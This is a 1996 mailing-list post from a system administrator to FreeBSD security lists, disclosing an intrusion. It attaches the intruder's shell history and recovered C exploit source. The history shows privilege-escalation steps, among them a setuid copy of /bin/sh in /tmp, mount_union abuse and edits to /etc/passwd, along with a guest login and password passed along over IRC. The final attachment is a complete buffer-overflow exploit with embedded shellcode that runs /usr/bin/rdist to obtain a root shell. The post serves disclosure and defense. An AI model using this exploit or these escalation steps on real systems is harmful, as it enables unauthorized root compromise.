Date: Sun, 14 Jul 1996 23:52:43 -0700 (PDT) From: jbhunt <jbhunt@mercury.gaianet.net> To: freebsd-security-notification@freebsd.org Cc: freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: New EXPLOIT located! Message-ID: <Pine.BSF.3.91.960714212321.1806A-300000@mercury.gaianet.net>
[-- Attachment #1 --] OK, for almost 3 weeks now we at Gaianet have been tracking root hackers around our box. FINALLY, today at about 3 pm one of them made a BIG BIG mistake. Fortunately for us, I was around to watch what happened and kill the user before he was able to erase his history files and the exploit itself. So here are the files you will need to fix whatever hole this exploits. We run FreeBSD-current, so it obviously makes most FreeBSD systems vulnerable to a root attack. I appreciate any help you can offer. John SysAdmin Gaianet [-- Attachment #2 --] #+0837233007 ls #+0837233007 ps x #+0837233007 crontab -e #+0837233007 crontab -e #+0837233007 ls #+0837233007 rm botchk #+0837233007 ps x #+0837233007 ps x #+0837233007 ps #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 botchk #+0837233007 ps #+0837233007 pico botchk #+0837233007 s x #+0837233007 ls #+0837233007 ps x #+0837233007 cd #+0837233007 ps #+0837233007 ls #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico Bot.Set #+0837233007 irc MrPenis #+0837233007 telnet albyl.ies.luth.se #+0837233007 telnet linus.artech.se #+0837233007 ls #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico Bot.Levels #+0837233007 ls #+0837233007 pico ComBot.lists #+0837233007 ps x #+0837233007 kill - 9757 #+0837233007 kil -9 757 #+0837233007 Com #+0837233007 kill -9 757 #+0837233007 ComBot #+0837233007 ps x #+0837233007 rlogin -l ls linus.artech.se #+0837233007 rlogin #+0837233007 help #+0837233007 rlogin -l root linus.artech.se #+0837233007 rlogin -l root sunny.bahnhof.se #+0837233007 rlogin -l ls linus.artech.se #+0837233007 rlogi #+0837233007 rlogin rlogi #+0837233007 rlogin -l henrikw sunny.bahnhof.se #+0837233007 xxc #+0837233007 ssh #+0837233007 rlogin kuai.se #+0837233007 S #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 rlogin -u 94b-cnb albyl.ies.luth.se #+0837233007 relogin -l 94b-cnb albyl.ies.luth.se #+0837233007 rlogin -l 
94b-cnb albyl.ies.luth.se #+0837233007 w #+0837233007 add #+0837233007 rlogin linus.artech.se #+0837233007 ps x #+0837233007 kill -9 22624 #+0837233007 kill -9 22626 #+0837233007 ls #+0837233007 ps x #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se: #+0837233007 ps #+0837233007 ps x #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 andersnotelnet mother.kajen.com #+0837233007 andersno #+0837233007 tenet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.com #+0837233007 telnet mother.kajen.se #+0837233007 telnet kajen.se #+0837233007 telnet linus.artech.se #+0837233007 tel #+0837233007 rlogin linus.artech.se #+0837233007 rlogin albyl.ies.luth.se #+0837233007 rlogin linus.artech.se -l ls #+0837233007 telnet flash-west.lakeheadu.ca #+0837233007 irc #+0837233007 irc #+0837233007 irc #+0837233007 irc #+0837233007 s #+0837233007 ls #+0837233007 ls #+0837233007 psx #+0837233007 ps x #+0837233007 ps #+0837233007 x #+0837233007 irc MacSourcE irc-2.stelath.net 5550 #+0837233007 zzz #+0837233007 irc MacSourcE #+0837233007 irc QuickTake irc.kern.com 6665 #+0837233007 irc MacSOS irc.epix.net 6665 #+0837233007 ir #+0837233007 /load textbox.irc #+0837233007 irc #+0837233007 ls #+0837233007 ps x #+0837233007 cd .Karma96 #+0837233007 ls #+0837233007 pico botchk #+0837233007 ls #+0837233007 ComBot #+0837233007 ps x #+0837233007 irc SonOSatan #+0837233007 ls #+0837233007 pico botchk #+0837233007 ls #+0837233007 botchk #+0837233007 ps x #+0837233007 crontab #+0837233007 crontab -e #+0837233007 ls #+0837233007 irc #+0837233007 irc #+0837233007 ps x #+0837233007 p #+0837233007 crontab -e #+0837233007 irc McH- irc.kern.com 6665 #+0837233007 ail #+0837233007 ps x #+0837233007 mail #+0837233007 rm c/var/mail/bgreg 
#+0837233007 /var/mail/bgreg #+0837233007 rm /var/mail/bgreg #+0837233007 cd /var/mail/bgreg #+0837233007 em #+0837233007 rm /var/mail/bgreg #+0837233007 irc #+0837233007 irc OldWarez irc.kern.com 6665 #+0837233007 irc Mofo #+0837233007 irc Moofo irc.mcs.net 6665 #+0837233007 rc Moofo irc.gate.net 6665 #+0837233007 rc Moofo irc.gate.net 6665 #+0837233007 irc #+0837233007 irc Moofo irc.ionet.net #+0837233007 irc Moofo irc.kern.com 6665 #+0837233007 ls #+0837233007 pico NewMACFilez_FAQ.txt #+0837233007 irc Moses irc.gate.net 6665 #+0837233007 irc #+0837233007 irc Gaylin #+0837233007 6 #+0837233007 irc #+0837233007 irc Gaylin irc.kern.com 6665 #+0837233007 irc MrFoose piglet.cc.utexas.edu 6665 #+0837233007 zxcas #+0837233007 irc MrFoose irc.bridge.net 6665 #+0837233007 irc TheHood irc.cris.com 6665 #+0837233007 irc Madam irc.spyder.org 6665 #+0837233007 irc #+0837233007 / #+0837233007 irc Julus irc.winternetcom 6665 #+0837233007 irc Moofo irc.winternet.com 6665 #+0837233007 ps x #+0837233007 irc RecCheck #+0837233007 irc Thrashed irc.kern.com 6665 #+0837233007 irc Thrashed irc.kern.rlogin linus.artech.se #+0834263877 rlogin albyl.ies.luth.se #+0834263877 rlogin linus.artech.se -l ls #+0834263877 telnet flash-west.lakeheadu.ca #+0834263877 irc #+0834263877 irc #+0834263877 irc #+0834263877 irc #+0834263877 s #+0834263877 ls #+0834263877 ls #+0834263877 psx #+0834263877 ps x #+0834263877 ps #+0834263877 x #+0834263910 irc MacSourcE irc-2.stelath.net 5550 #+0834263920 zzz #+0834263925 irc MacSourcE #+0834291161 irc QuickTake irc.kern.com 6665 #+0834292904 irc MacSOS irc.epix.net 6665 #+0834366923 ir #+0834366926 /load textbox.irc #+0834366928 irc #+0834407134 ls #+0834407137 ps x #+0834407144 cd .Karma96 #+0834407144 ls #+0834407155 pico botchk #+0834407168 ls #+0834407173 ComBot #+0834407177 ps x #+0834407192 irc SonOSatan #+0834407341 ls #+0834407349 pico botchk #+0834407369 ls #+0834407375 botchk #+0834407380 pirc #+0837233007 q #+0837233007 irc #+0837233007 irc 
#+0837233007 telnet netvirtual.com #+0837233007 virtual.com #+0837233007 telnet netvirtual.com #+0837233007 irc Aspect][ irc.stealth.net:6665 #+0837233007 irc Aspect][ irc.uic.edu 6665 #+0837233007 irc Aspect][ irc.phoenix.net:6665 #+0837233007 irc #+0837233007 lynx http://www.blue-cow.com/ #+0837233007 cd .secret #+0837233007 cloines.pl #+0837233007 ls #+0837233007 clones.pl #+0837233007 ./clones.pl #+0837233007 chmod +x clones.pl #+0837233007 clones.pl #+0837233007 perl clones.pl #+0837233007 perl5.001 clones.pl #+0837233007 ls #+0837233007 perl clones.pl #+0837233007 telnet alf.uccs.edu #+0837233007 telnet TriState.TSEI.K12.MS.US #+0837233007 153.37.93.61 #+0837233007 irc MacFriend irc.phoenix.net:6665 #+0837233007 ls #+0837233007 tar -xvf Karma96.tar #+0837233007 tar -cvf Karma96.tar .Karma96 #+0837233007 ls #+0837233007 gzip Karma96.tar #+0837233007 ls #+0837233007 rm c.pl #+0837233007 cd .secret #+0837233007 mv clones.pl dick_doubler #+0837233007 cd #+0837233007 irc MacH- irc.voicenet.com:6665 #+0837233007 irc Quaz irc.voicenet.com:6665 #+0837233007 irc MacH- irc.neosoft.com:6665 #+0837233007 whoami #+0837233007 ; ^?ls #+0837233007 ls #+0837233007 irc.ionet.net #+0834462070 irc Moofo irc.kern.com 6665 #+0834462461 ls #+0834462468 pico NewMACFilez_FAQ.txt #+0834463519 irc Moses irc.gate.net 6665 #+0834463749 irc #+0834513921 irc Gaylin #+0834513966 6 #+0834513969 irc #+0834514033 irc Gaylin irc.kern.com 6665 #+0834527496 irc MrFoose piglet.cc.utexas.edu 6665 #+0834530564 zxcas #+0834530570 irc MrFoose irc.bridge.net 6665 #+0834530738 irc TheHood irc.cris.com 6665 #+0834530834 irc Madam irc.spyder.org 6665 #+0834530860 irc #+0834530893 / #+0834530910 irc Julus irc.winternetcom 6665 #+0834531005 irc Moofo irc.winternet.com 6665 #+0834592640 ps x #+0834592679 irc RecCheck #+0834602243 irc Thrashed irc.kern.com 6665 #+0834602334 irc Thrashed irc.kern.com 6665 #+0834602671 irc Thrashed irc.ionet.net #+0834602706 xczxzXczxcZXirc #+0834602711 irc #+0834602774 irc 
/sserver #+0834602778 irc Mr #+0834602815 d #+0834606811 ls #+0834606816 ps x #+0834606819 cd .karma96 #+0834606825 cd .Karma96 #+0834606828 ComBot #+0834606835 ps x #+0834612306 telnet wtelnet wakko.gil.net #+0834612324 telnet wakko.gil.net #+0834635257 chmod +x clones.pl #+0834635261 limits #+0834635266 clones.pl #+0834636712 rm clones.pl #+0834636715 ]bye #+0834636715 quit #+0834636715 q #+0834636742 rm clonesq #+0834764665 telnet cns.networkamerica.com #+0834765074 rlogin linus.artech.se -l ls #+0834765136 rlog #+0834765161 rlogin linus.artech.se -l thomas #+0834765272 telnet scooby.tiac.net #+0834765634 ls #+0834765646 cd .Karma96 #+0834765654 ps x #+0834765662 ComBot #+0834765901 telnet scooby.tiac.net #+0834766199 cxcx #+0835484480 cd .secret #+0835484499 perl5.001 clones.pl #+0835484504 ls #+0835484514 chmod +x clones.pl #+0835484517 ls #+0835484519 clones.pl #+0835484525 perl clones.pl #+0835484539 perl #+0835484568 perl15 clones.pl #+0835484573 perl clones.pl #+0835484781 chmod +p clones.pl #+0835484783 clones.pl #+0835484791 chmod -x clones.pl #+0835484792 ls #+0835484796 clones.pl #+0835484800 perl clones.pl #+0835554162 irc Immortal irc.ionet.net:6665 #+0835554218 irc #+0835554255 irc Immortal irc.bridge.net 6665 #+0835576307 irc ddd irc.bridge.net 6665 #+0835663051 irc GetBack irc.ais.net:6665 #+0835740871 irc GateIt irc.gate.net:6665 #+0835748330 irc BeJesus irc.gate.net:6665 #+0835749143 irc Scanner irc.ionet.net:6665 #+0835749541 irc #+0835749561 rver irc. 
#+0835749563 r #+0835749564 irc #+0835749594 q #+0835749599 irc #+0835749689 irc #+0835752975 telnet netvirtual.com #+0835755590 virtual.com #+0835755596 telnet netvirtual.com #+0836021757 irc Aspect][ irc.stealth.net:6665 #+0836021885 irc Aspect][ irc.uic.edu 6665 #+0836022158 irc Aspect][ irc.phoenix.net:6665 #+0836022699 irc #+0836027500 lynx http://www.blue-cow.com/ #+0836067253 cd .secret #+0836067257 cloines.pl #+0836067258 ls #+0836067261 clones.pl #+0836067264 ./clones.pl #+0836067336 chmod +x clones.pl #+0836067339 clones.pl #+0836067343 perl clones.pl #+0836067361 perl5.001 clones.pl #+0836067366 ls #+0836067450 perl clones.pl #+0836067470 telnet alf.uccs.edu #+0836067492 telnet TriState.TSEI.K12.MS.US #+0836067788 153.37.93.61 #+0836086091 irc MacFriend irc.phoenix.net:6665 #+0836207825 ls #+0836207829 tar -xvf Karma96.tar #+0836207909 tar -cvf Karma96.tar .Karma96 #+0836207913 ls #+0836207930 gzip Karma96.tar #+0837099748 ls #+0837099762 rm c.pl #+0837099766 cd .secret #+0837099775 mv clones.pl dick_doubler #+0837099778 cd #+0837099800 irc MacH- irc.voicenet.com:6665 #+0837136232 irc Quaz irc.voicenet.com:6665 #+0837152438 irc MacH- irc.neosoft.com:6665 #+0837218680 ls #+0837218692 cp Karma96.tar.gz ~/.secret #+0837218694 cd .secret #+0837218695 ls #+0837218703 mv Karma96.tar.gz k #+0837218705 ls #+0837218707 cd #+0837218708 ls #+0837218712 rm Karma96.tar.gz #+0837218716 passwd #+0837218724 passwd #+0837218737 ls #+0837218781 irc MacH- irc.netvirtual.com:6665 #+0837219220 irc MacH- #+0837220444 telnet *RyeBrye* Dude, telnet to griffin.emba.uvm.edu username: guest1-60 pw:fred949 #+0837220450 telnet griffin.emba.uvm.e #+0837220455 telnet griffin.emba.uvm.e #+0837220462 telnet griffin.emba.uvm.edu #+0837220501 xz #+0837220511 telnet emba.uvm.edu #+0837221920 rct #+0837221922 ls #+0837221937 ps x #+0837221942 csh #+0837233051 irc MacH- thorn.got.net:666 #+0837249687 ls #+0837249719 who #+0837249734 ls #+0837249745 rm karma96 #+0837249747 ks #+0837249748 ls 
#+0837249751 ls #+0837249754 ls #+0837249760 ls #+0837249764 ls #+0837249766 ls #+0837249769 l #+0837249782 ftp digital.netvoyage.net #+0837249802 ls #+0837249812 ftp digital.netvoyage.net #+0837249828 ls #+0837249857 ls #+0837249861 ls #+0837249873 irc #+0837249878 irc -d #+0837250075 ls #+0837250080 cc -o zap zap.c #+0837250085 pico zap.c #+0837250089 exit #+0837250124 ls #+0837250127 pico zap.c #+0837250151 ls #+0837250159 cc -o zap zap.c #+0837250168 cc -o c c.c #+0837250175 cc -o a a.c #+0837250177 ls #+0837250184 rm a.c #+0837250186 rm c.c #+0837250191 irc #+0837250241 ls #+0837250245 ls #+0837250249 rm c #+0837250253 ls #+0837250265 cd /etc #+0837250266 ls #+0837250275 pico passwd #+0837250281 cd #+0837250285 pico c.c #+0837250292 ls #+0837250301 a #+0837250447 ls #+0837250451 ls #+0837250454 rm c #+0837250458 ls #+0837250461 pico c.c #+0837250468 cd /etc #+0837250476 pico passwd #+0837250488 cd #+0837250490 pico c.c #+0837250509 cc -o c #+0837250513 cc -o c c.c #+0837250514 c #+0837252383 exit #+0837288372 w #+0837310427 rpc #+0837310455 find / -name ircd.conf -print #+0837310656 zxczxcctalk #+0837310662 talk superduck #+0837310675 w #+0837310696 talk hawkie #+0837310816 zxc #+0837310818 w #+0837310878 ./t3 194.22.189.95 #+0837310889 t3 #+0837311105 talk hawkie@mercury.gaianet.net #+0837311209 irc MacH irc.cris.com:6665 #+0837311405 ls #+0837311409 pico mountbug.txt #+0837311443 ls #+0837311454 at > /tmp/modload #+0837311460 cat > /tmp/modload #+0837311462 ccat > /tmp/modload #+0837311464 cat > /tmp/modload #+0837311495 cp /bin/sh /tmp/rootshell #+0837311506 chmod 4755 /tmp/rootshell #+0837311533 cd /tmp #+0837311535 ls #+0837311543 rootshell #+0837311647 cd /tmp #+0837311648 ls #+0837311652 rootshell #+0837312174 cd /tmp #+0837312175 ls #+0837312181 rm rootshell #+0837312192 t3 #+0837312207 cat > /tmp/modload #+0837312233 cp /bin/sh /tmp/rootshell #+0837312238 ls #+0837312248 chmod 4755 /tmp/rootshell #+0837312255 chmod 4755 /tmp/rootshell #+0837312263 
chmod +x /tmp/modload #+0837312272 set path= ( /tmp $path ) #+0837312279 mkdir /tmp/a #+0837312287 mkdir /tmp/b #+0837312294 /sbin/mount_union /tmp/a /tmp/b #+0837312316 cp /sbin/mount_union /tmp/a /tmp/b #+0837312325 /tmp/rootshell #+0837312648 cd /tmp #+0837312650 ls #+0837312656 ps -aux #+0837312690 syslogd #+0837312699 screen #+0837314733 cd .secret #+0837314736 dick_doubler #+0837314738 ls #+0837314755 pico dick_doubler #+0837315057 telnet www.hookup.net #+0837315752 telnet www.hookup.net #+0837316927 nslookup 185.37.209.17 #+0837317334 find -name rpc -print #+0837317353 find / -name rpc -print #+0837317404 /usr/src/etc/rpc #+0837317409 /usr/src/include/rpc #+0837317413 /usr/src/lib/libc_r/rpc #+0837317416 /usr/src/lib/libc/rpc #+0837317424 cd / #+0837317425 ls #+0837317432 ls -l #+0837317450 COPYRIGHT #+0837317456 OK #+0837317466 cd bin #+0837317470 ls -l #+0837317482 cd / #+0837317483 ls #+0837317489 ls -l #+0837317497 62 ; 1 ; 6c cdrom #+0837317500 cd cdrom #+0837317503 ls #+0837317508 ls -l #+0837317511 cd #+0837317514 cd / #+0837317544 cd cdcompat #+0837317548 cd compat #+0837317550 ls -l #+0837317559 cd linux #+0837317563 ls -l #+0837317574 cd etc #+0837317577 ls -l #+0837317639 cd /compat/linux #+0837317642 ls -l #+0837317647 cd lib #+0837317649 ls -l #+0837317662 ls / -l #+0837317733 ls -l #+0837317739 dc / #+0837317818 cd / #+0837317820 ls -l #+0837317944 root #+0837317947 proc #+0837317950 mnt #+0837317961 lkm #+0837317977 cd root #+0837317979 ls #+0837317988 acreate.sh #+0837317991 ls -l #+0837317999 cd / #+0837318000 ls -l #+0837318015 cd proc #+0837318017 ls #+0837318022 ls -l #+0837318037 95 #+0837318050 cd / #+0837318054 ls -l #+0837318081 cd dev #+0837318082 ls #+0837318105 vga #+0837318112 ls -l #+0837318224 kmem #+0837318313 cd / #+0837318314 ls #+0837318317 ls -l #+0837318329 cd /etc #+0837318330 ls #+0837318335 ls -l #+0837318367 ls -ltermcap #+0837318371 termcap #+0837318378 rpc #+0837318396 pico spwd.db #+0837318408 ls -l #+0837318461 rmt 
#+0837318471 whoami #+0837318559 adduser.conf.bak #+0837319004 find / -name root -print #+0837321186 talk ( digital@millennium.stealth.net #+0837321192 talk digital@millennium.stealth.net #+0837321260 write digital@millennium.stealth.net #+0837321276 write digital@stealth.net #+0837321335 telnet irc02.irc.aol.com #+0837321458 write digital@millennium.stealth.net #+0837321501 write sdebnath@home.metnet.com #+0837321515 write zirc@tundra.winternet.com #+0837321527 write zirc@winternet.com #+0837321536 talk digital@millennium.stealth.net #+0837321971 w #+0837321983 ping -l 99999 digital #+0837322074 ls #+0837322076 sl #+0837322076 sls #+0837322077 sls #+0837322078 ls #+0837322079 ls #+0837322080 sl #+0837322081 sls #+0837322108 locate #+0837322113 locate root #+0837322124 locate ircd.conf #+0837322146 /usr/src/etc/root #+0837322165 locate rpc #+0837322366 cd / #+0837322367 ls #+0837322374 cdrom' #+0837322377 kernel.GENERIC #+0837322380 kernel.old #+0837322386 kernel #+0837322391 cd mnt #+0837322392 ls #+0837322398 lk 0l #+0837322409 uname -a #+0837322433 l #+0837322441 locate ROOT #+0837322456 find / -name ROOT -print #+0837322830 irc GoatOp irc.cris.com:6665 #+0837373784 name -a #+0837373788 uname -a #+0837375479 ls #+0837375490 cd /usr #+0837375491 ls #+0837375494 cd/tmp #+0837375496 cd/ tmp #+0837375499 ls #+0837375509 cd /tm[ #+0837375512 cd /tmp #+0837375513 ls #+0837375523 umkdep1505 #+0837375528 cd /usr/tmp #+0837375529 ls #+0837375532 cd #+0837375543 od tin_nntp010238 #+0837375546 htstatus.000213 ice0043.JPG mkdep1588 screenss tin_nntp028551 #+0837375546 bgreg@mercury [1:18pm][/tmp] >> umkdep1505 #+0837375546 umkdep1505: Command not found. 
#+0837375546 bgreg@mercury [1:18pm][/tmp] >> cd /usr/tmp #+0837375546 bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375547 018.JPG ice0040.JPG kernel+ibcs2 saver_mod tin_nntp010238 #+0837375547 htstatus.000213 ice0043.JPG mkdep1588 screens tin_nntp028551 #+0837375548 bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375548 bgreg@mercury [1:18pm][~] >> od tin_nntp010238 #+0837375548 hexdump: tin_nntp010238: No such file or directory #+0837375551 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.J[/tmp] >> cd /usr/tmp #+0837375551 bgreg@mercury: No match. #+0837375551 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375551 bgreg@mercury: No match. #+0837375551 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375552 er_mod tin_nntp010238 #+0837375552 018.JPG: Command not found. #+0837375552 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scr #+0837375553 eens tin_nntp028551 #+0837375553 htstatus.000213: Command not found. #+0837375553 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375553 bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375554 bgreg@mercury: No match. #+0837375554 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375554 bgreg@mercury: No match. #+0837375554 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375555 er_mod tin_nntp010238 #+0837375555 018.JPG: Command not found. #+0837375555 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scr #+0837375556 eens tin_nntp028551 #+0837375556 htstatus.000213: Command not found. #+0837375556 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> cd #+0837375556 bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375556 bgreg@mercury: No match. #+0837375556 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm][/usr/tmp] >> ls #+0837375556 bgreg@mercury: No match. 
#+0837375556 bgreg@mercury [1:19pm][~] >> 018.JPG ice0040.JPG kernel+ibcs2 sav #+0837375557 er_mod tin_nntp010238 #+0837375557 018.JPG: Command not found. #+0837375565 bgreg@mercury [1:19pm][~] >> htstatus.000213 ice0043.JPG mkdep1588 scmmand not found. #+0837375565 htstatus.000213:: Too many arguments. #+0837375565 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm] #+0837375565 [/usr/tmp] >> cd #+0837375566 Ambiguous output redirect. #+0837375566 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match.[/tmp] >> cd /usr/tmp #+0837375566 cd: Too many arguments. #+0837375566 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match. #+0837375567 bgreg@mercury:: Too many arguments. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:18pm] #+0837375567 [/usr/tmp] >> ls #+0837375567 Ambiguous output redirect. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury: No match. #+0837375567 bgreg@mercury:: Too many arguments. #+0837375567 bgreg@mercury [1:19pm][~] >> bgreg@mercury [1:19pm][~] >> 018.JPG ice004 #+0837375567 0.JPG kernel+ibcs2 sav #+0837375568 bgreg@mercury: No match. #+0837375568 bgreg@mercury [1:19pm][~] >> er_mod tin_nntp010238 #+0837375568 er_mod: Command not found. #+0837375568 bgreg@mercury [1:19pm][~] >> 018.JPG: Command not found. 
#+0837375573 018.JPG:: Too many arguments.kjsad\]a #+0837375576 trhere a re to manu #+0837375577 ls -l #+0837375578 cd / #+0837375579 l #+0837375589 chroot #+0837375604 ps -aux #+0837375640 itv #+0837375643 irc #+0837375755 passwd #+0837375761 passwd #+0837375797 cd #+0837375800 ls #+0837375807 ls #+0837375824 cd /home/bgreg #+0837375835 ls #+0837375901 w #+0837375913 ls #+0837375933 rm -rf htstatus.000213 od ls i 018.JPG: 018.JPG umkdep1505 #+0837375935 ls #+0837375947 rm -rf er_mod dead.letter cd #+0837375949 ls #+0837375970 w #+0837376000 wrote erb #+0837376003 write erb #+0837376020 w #+0837376071 finger erb #+0837376109 w #+0837376128 ls #+0837376206 w #+0837376216 irc #+0837376421 w #+0837376432 cd /bin/sh #+0837376434 cd /bin/sh #+0837376438 cd bin? #+0837376454 ls #+0837376550 irc Mc9 irc.superlink.net #+0837376924 rumisad #+0837376928 rumisbad #+0837376931 w #+0837376947 ls #+0837376954 ls -l #+0837376980 z #+0837376990 z.o #+0837376994 z.o #+0837376999 a.out #+0837378120 w #+0837378129 talk bgreg #+0837378167 talk bgreg@mercury.gaianet.net #+0837378403 w #+0837378421 ps x #+0837378434 kill -9 15685 #+0837378442 kill -9 15437 #+0837378445 ls #+0837378562 ls #+0837378569 ddd #+0837378592 a.out #+0837379448 ls #+0837379458 gcc -o d d.c #+0837379461 d #+0837379506 whoami #+0837379510 root #+0837379515 d #+0837379606 login #+0837380631 c [-- Attachment #3 --]
/*
 * Attachment #3: the proof-of-concept source recovered from the account,
 * as posted to the list.  i386-specific (inline asm, 32-bit register
 * names) and written for the FreeBSD-current of the period; the notes
 * below record the assumptions it bakes in, for whoever traces the hole.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Default distance, in bytes, added to the current stack pointer when
 * computing the return address written into the buffer; argv[1] overrides. */
#define DEFAULT_OFFSET 50
/* Size of the region filled before the two return addresses are appended. */
#define BUFFER_SIZE 256

/* Reads the stack pointer on i386.  Note there is no return statement:
 * the value is left in %eax by the asm and the compiler is expected to
 * hand that back as the result.  That is undefined behaviour in C and
 * only works with the calling convention and code generation of the
 * original toolchain. */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }

/* Builds one 4096-byte argument string and execs /usr/bin/rdist with it
 * passed twice as the value of -d.  Implicit-int main, as received.
 * argv[1], when present, is the stack offset (see DEFAULT_OFFSET). */
main(int argc, char **argv) {
  char *buff = NULL;
  unsigned long *addr_ptr = NULL;
  char *ptr = NULL;
  /* so you dont have to disassemble it, here is the asm code:
     start:       jmp endofk0dez
     realstart:   popl %esi
                  leal (%esi), %ebx
                  movl %ebx, 0x0b(%esi)
                  xorl %edx, %edx
                  movl %edx, 7(%esi)
                  movl %edx, 0x0f(%esi)
                  movl %edx, 0x14(%esi)
                  movb %edx, 0x19(%esi)
                  xorl %eax, %eax
                  movb $59, %al
                  leal 0x0b(%esi), %ecx
                  movl %ecx, %edx
                  pushl %edx
                  pushl %ecx
                  pushl %ebx
                  pushl %eax
                  jmp bewm
     endofk0dez:  call realstart
                  .byte '/', 'b', 'i', 'n', '/', 's', 'h'
                  .byte 1, 1, 1, 1
                  .byte 2, 2, 2, 2
                  .byte 3, 3, 3, 3
     bewm:        .byte 0x9a, 4, 4, 4, 4, 7, 4 */
  char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
  int i;
  int ofs = DEFAULT_OFFSET;
  /* if we have a argument, use it as offset, else use default
     (atoi: no error reporting, a non-numeric argument silently becomes 0) */
  if(argc == 2) ofs = atoi(argv[1]);
  /* print the offset in use
     (get_esp()+ofs is a long, but %x expects an unsigned int) */
  printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
  buff = malloc(4096);
  /* exit(0) on allocation failure reports success to the caller */
  if(!buff) { printf("can't allocate memory\n"); exit(0); }
  ptr = buff;
  /* fill start of buffer with nops
     (memset and strlen are used without <string.h>: implicit declarations) */
  memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  ptr += BUFFER_SIZE-strlen(execshell);
  /* stick asm code into the buffer */
  for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i];
  /* write the return addresses
  **
  ** return address          4
  ** ebp                     4
  ** register unsigned n     0
  ** register char *cp       0
  ** register struct syment *s 0
  **
  ** total: 8
  */
  /* cast is to long * while addr_ptr is unsigned long * — type mismatch as received */
  addr_ptr = (long *)ptr;
  /* 8/4 == 2: both 4-byte slots get the same address */
  for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs;
  ptr = (char *)addr_ptr;
  *ptr = 0;
  /* replaces this process; only returns on failure, which is not checked */
  execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL);
}
